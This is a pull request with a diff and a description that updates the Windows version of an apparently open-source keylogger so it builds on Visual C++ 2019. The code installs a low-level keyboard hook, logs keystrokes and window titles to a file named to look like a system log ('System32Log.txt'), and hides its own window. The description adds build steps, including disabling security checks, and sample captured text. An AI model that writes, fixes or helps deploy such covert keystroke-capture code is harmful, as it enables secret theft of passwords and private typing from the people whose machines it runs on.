### PR TITLE
Little modifications to the Window version in order to build on VC++ 2019... what about merging?

### DIFF
--- a/windows/klog_main.cpp
+++ b/windows/klog_main.cpp
@@ -19,8 +19,6 @@ KBDLLHOOKSTRUCT kbdStruct;
 int Save(int key_stroke);
 std::ofstream OUTPUT_FILE;
 
-extern char lastwindow[256];
-
 // This is the callback function. Consider it the event that is raised when, in this case, 
 // a key is pressed.
 LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam)
@@ -50,7 +48,9 @@ void SetHook()
 	// function that sets and releases the hook.
 	if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0)))
 	{
-		MessageBox(NULL, "Failed to install hook!", "Error", MB_ICONERROR);
+		LPCWSTR a = L"Failed to install hook!";
+		LPCWSTR b = L"Error";
+		MessageBox(NULL, a, b, MB_ICONERROR);
 	}
 }
 
@@ -61,14 +61,14 @@ void ReleaseHook()
 
 int Save(int key_stroke)
 {
-    char lastwindow[256];
+	static char lastwindow[256] = "";
     
 	if ((key_stroke == 1) || (key_stroke == 2))
 		return 0; // ignore mouse clicks
 	
 	HWND foreground = GetForegroundWindow();
     DWORD threadID;
-    HKL layout;
+    HKL layout = NULL;
     if (foreground) {
         //get keyboard layout of the thread
         threadID = GetWindowThreadProcessId(foreground, NULL);
@@ -77,8 +77,8 @@ int Save(int key_stroke)
 
     if (foreground)
     {
-        char window_title[256];
-        GetWindowText(foreground, window_title, 256);
+		char window_title[256];
+        GetWindowTextA(foreground,(LPSTR)window_title, 256);
         
         if(strcmp(window_title, lastwindow)!=0) {
             strcpy(lastwindow, window_title);
@@ -145,6 +145,7 @@ int Save(int key_stroke)
         if (!lowercase) key = tolower(key);
 		OUTPUT_FILE <<  char(key);
     }
+	
 	//instead of opening and closing file handlers every time, keep file open and flush.
     OUTPUT_FILE.flush();
 	return 0;
@@ -165,7 +166,6 @@ int main()
 {
 	//open output file in append mode
     OUTPUT_FILE.open("System32Log.txt",std::ios_base::app);	
-
 	// visibility of window
 	Stealth();
 


### PR DESCRIPTION
Hi Giacomo,

I've done some little modifications to the Window version in order to build on following recent rev of Visual C++ (tested both as x86 and x64):

Microsoft Visual Studio Community 2019
Version 16.4.6
VisualStudio.16.Release/16.4.6+29905.134
Microsoft .NET Framework
Version 4.8.03752

Installed Version: Community

Visual C++ 2019   00435-60000-00000-AA503
Microsoft Visual C++ 2019

Build a new Visual C++ solution to compile and build.
Add in the "Source Files" folder (Solution view) the existent file "\windows\klog_main.cpp" from this project NOTE: In the project properties menu, remember to set "C/C++" --> "Code generation" --> "Security Check" as "Disable Security Check (/GS-)" in order to use unsafe code.

Output example (in "System32Log.txt" in the local folder):

                        [Window: *Senza nome - Blocco note di Windows - at Sat Apr 11 17:15:32 2020] [SHIFT]Notepad just opened[SHIFT]1 [SHIFT]Hello everyone[SHIFT]111

Note that "[SHIFT]1" is "!"

I hope this contribution will be useful.